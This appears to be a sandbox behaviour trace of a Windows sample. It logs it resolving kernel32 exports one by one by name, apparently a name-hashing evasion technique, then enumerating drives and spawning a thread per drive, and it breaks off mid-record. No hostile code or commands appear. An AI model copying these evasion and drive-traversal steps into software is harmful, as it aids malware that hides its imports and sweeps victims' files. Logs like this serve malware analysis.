[0179.132] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0179.132] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0179.132] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0179.132] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0179.132] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0179.133] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0179.133] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0179.133] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0179.133] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0179.133] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0179.133] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0179.133] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0179.133] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0179.133] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0179.133] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0179.133] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0179.133] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0179.133] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0179.133] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0179.133] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0179.133] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0179.133] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0179.133] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0179.133] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x6a0000 [0179.133] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0x6a0000 | out: lpBuffer="C:\\") returned 0x4 [0179.134] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0179.134] lstrlenW (lpString="C:\\") returned 3 [0179.134] VirtualAlloc (lpAddress=0x0, dwSize=0x5006, flAllocationType=0x3000, flProtect=0x4) returned 0x6c0000 [0179.134] lstrcpyW (in: lpString1=0x6c0000, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0179.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd43c0, lpParameter=0x6b0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x22c [0179.135] VirtualFree (lpAddress=0x6a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.136] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd46e0, lpParameter=0x239fd90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x218 [0179.151] WaitForMultipleObjects (nCount=0x2, lpHandles=0x239fd98*=0x22c, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 250 os_tid = 0x6b0 Thread: id = 251 os_tid = 0x6b4 Thread: id = 252 os_tid = 0x6b8 Thread: id = 253 os_tid = 0x6bc Thread: id = 339 os_tid = 0x308 [0178.369] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x3d0000 [0178.369] lstrlenA (lpString="kernel32.dll") returned 12 [0178.369] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.369] lstrcpyA (in: lpString1=0x32deee0, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.369] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.369] lstrcpyA (in: lpString1=0x32deee0, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.369] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.369] lstrcpyA (in: lpString1=0x32deee0, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.369] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.369] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.369] lstrlenA (lpString="ADDATOMA") returned 8 [0178.369] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.369] lstrlenA (lpString="ADDATOMW") returned 8 [0178.369] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.370] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.370] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.370] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.370] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.370] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.370] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.370] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.370] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.370] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.370] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.370] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.370] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.370] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.370] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.370] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.370] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.370] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.370] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.370] lstrcpyA (in: lpString1=0x32deee0, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.370] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.371] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.371] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.371] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.371] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.371] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.371] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.371] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.371] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.371] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.371] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.371] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.371] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.371] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.371] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.371] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.371] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.371] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.371] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.371] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.371] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.372] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.372] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.372] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.372] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.372] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.372] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.372] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.372] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.372] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.372] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.372] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.372] lstrlenA (lpString="BEEP") returned 4 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.372] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.372] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.372] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.372] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.372] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.372] lstrcpyA (in: lpString1=0x32deee0, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.372] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.373] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.373] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.373] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.373] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.373] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.373] lstrlenA (lpString="CANCELIO") returned 8 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.373] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.373] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.373] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.373] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.373] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.373] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.373] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.373] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.373] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.373] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.373] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.373] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.373] lstrcpyA (in: lpString1=0x32deee0, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.374] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.374] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.374] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.374] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.374] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.374] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.374] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.374] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.374] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.374] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.374] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.374] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.374] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.374] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.374] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.374] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.374] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.374] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.374] lstrcpyA (in: lpString1=0x32deee0, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.375] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.375] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.375] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.375] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.375] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.375] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="ContinueDebugEvent" | out: 